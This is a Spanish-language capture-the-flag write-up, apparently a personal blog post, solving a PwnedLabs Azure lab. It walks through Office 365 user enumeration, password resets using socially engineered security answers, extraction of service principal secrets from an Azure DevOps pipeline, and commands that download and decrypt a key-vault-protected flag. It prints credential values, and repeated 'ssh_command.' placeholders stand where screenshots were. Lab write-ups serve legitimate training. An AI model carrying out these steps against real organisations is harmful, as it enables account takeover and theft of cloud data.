PwnedLabs Gain Initial Access via Social Engineering

PwnedLabs Gain Initial Access via Social Engineering


Azure

ssh_command.

Aqui le pregunto a Alex su apellido y dice que es Rivera. Tambien esta Sam Patel.

ssh_command.

Hacemos el git clone.

git clone https://github.com/hac01/uwg.git

ssh_command.

python main.py -n "Sam Patel" -d megabigtech.com

batcat wordlist.txt

ssh_command.

ssh_command.

sudo python omnispray.py --type enum -uf wordlists.txt --module 0365_enum_office

ssh_command.

ssh_command.

Vemos que Alex.Rivera@megabigtech.com y Sam.Patel@megabigtech.com es valido.

ssh_command.

Nos dirigimos a https://aka.ms/sspr para resetear las contrasenas.

ssh_command.

ssh_command.

Buena gente el Sam. Nos dio la respuesta a todas las preguntas.

ssh_command. ssh_command. ssh_command.

Las respuestas para Alex son Park,London, y Dallas.

ssh_command.

Cambiamos la contrasena.

ssh_command.

Trate de iniciar sesion por el cli pero no me dejo.

ssh_command.

Y si lo hacia por el portal tenia que tener un dispositivo para verificar que era yo.

ssh_command.

Nos dirigimos a https://myapps.microsoft.com para tener una idea de que tipo de herramientas tiene acceso Sam.

ssh_command.

Le damos click a azure devops

ssh_command.

Vemos que mid tier capital tiene Repos y Pipelines

ssh_command.

Trate de clonear el repo pero no me dejo

ssh_command.

En Pipelines vemos create-service-principal

ssh_command.

Abrimos el archivo azure-pipelines.yml y vemos lo siguiente:

ssh_command.

No estoy seguro si en otra cuenta se pueden ver otros archivos pero a mi solo me salio este.

En la linea 51-54 vemos que despliega TenantId,ClientID y sus secretos.

ssh_command.

Le damos click a Run

ssh_command.

Al terminar podemos ver la tarea.

ssh_command.

Podemos ver que la informacion de los ids y el secreto.

ssh_command.

ssh_command.

Display Name : my-sp-20251013.1

Tenant ID : 3ef08095-48eb-49a3-be1e-caf48fba5f7c

Client ID : b573c9ca-4692-4b30-a19d-83851bb41fd1

Client Secret : 3D08Q~6Zb4awEyY9g3KwjcF4Lg6v-QmtPjCFoceT

Para poder validar esto podemos hacerlo en dos maneras

Import-Module AADInternals

Get-AADIntTentantID -Domain midtiercapital.com

ssh_command.

Get-AADIntLoginInformation -Domain midtiercapital.com

ssh_command.

La otra manera es https://osint.aadinternals.com

ssh_command. https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli-service-principal?view=azure-cli-latest

Yo siempre trato de limpiar todo antes de iniciar sesion.

az logout

Disconnect-AzAccount

Tenant ID : 3ef08095-48eb-49a3-be1e-caf48fba5f7c

Client ID : 110b1c4c-8b39-486a-855a-fae51c3a3a3f

Client Secret : iNw8QVvdAfqg-viklgkR.0YtswMVeYgFr08apw

az login --service-principal --username '110b1c4c-8b39-486a-855a-fae51c3a3a3f' --password 'iNw8Q~VvdAfq~g-viklgkR.0YtswMVeYgFr08apw' --tenant '3ef08095-48eb-49a3-be1e-caf48fba5f7c'

ssh_command.

az resource list

Podemos ver que tenemos dos recursos llamados samtc01 y kv-mtc-01. Uno parece ser almacenamiento y el otro un key vault.

ssh_command.

https://learn.microsoft.com/en-us/cli/azure/storage/account/keys?view=azure-cli-latest

az storage account keys list -g rg-mtc-01 -n samtc01

ssh_command.

No pude ver nada ya que parece que mi usuario no esta autorizado. Vemos el nombre de un contenedor llamado encrypted-store.

ssh_command.

az storage blob list --account-name samtc01 --container-name encrypted-store --output table --auth-mode login

ssh_command.

Vemos que tiene un archivo llamado flag.txt.enc

Para poder bajar el archivo hacemos el siguiente comando:

az storage blob download --account-name samtc01 --container-name encrypted-store -name flag.txt.enc --auth-mode login --file ./flag.txt.enc

ssh_command.

El archivo esta encriptado y si hacemos un batcat flag.txt.enc no sale nada.

ssh_command.

No podemos desplegar listas de secretos.

az keyvault secret list --vault-name kv-mtc-01 -o table

ssh_command.

az keyvault key list --vault-name kv-mtc-01 -o table

Aqui se puede ver la llave data-gen.

ssh_command.

Vamos a pasar la informacion a base64

base64 -w0 flag.txt.enc > encrypted.b64

ssh_command.

az keyvault key decrypt --vault-name -kv-mtc-01 --name data-gen --algorithm RSA-OAEP --value "c4N2h83UA+GNxguq+f+TDfzQYsnlRBCLzr2FjZpjwTDe+qqftSXMrjoAkimKoALk5nzrkfVxQUF8mvH0tJjlYPc9hOHfmgWOgvcQWcAon4JWzNcf8SRVOL8b75G3LSOVxjmgX+znbLhf+PruAdXghJa4OITx7CQoYVj5ZcogAMs8feThrnr7OoHPW/BtbTKsiVPixGp0PdTdhIq76DfVUEtZSK4skcw7iouGw2hF7a1T2W1Wy6BL8O+ySG+tTERwjBHeiWoUrYN+feP40xaVQF3HDPtjxwezmgvux0Tqw8B1hxJnoa1mImj7GjC+3z7U75tupLJgLibSr7dyNQ6liQ=="

ssh_command.

© 2025 Cu3rv0x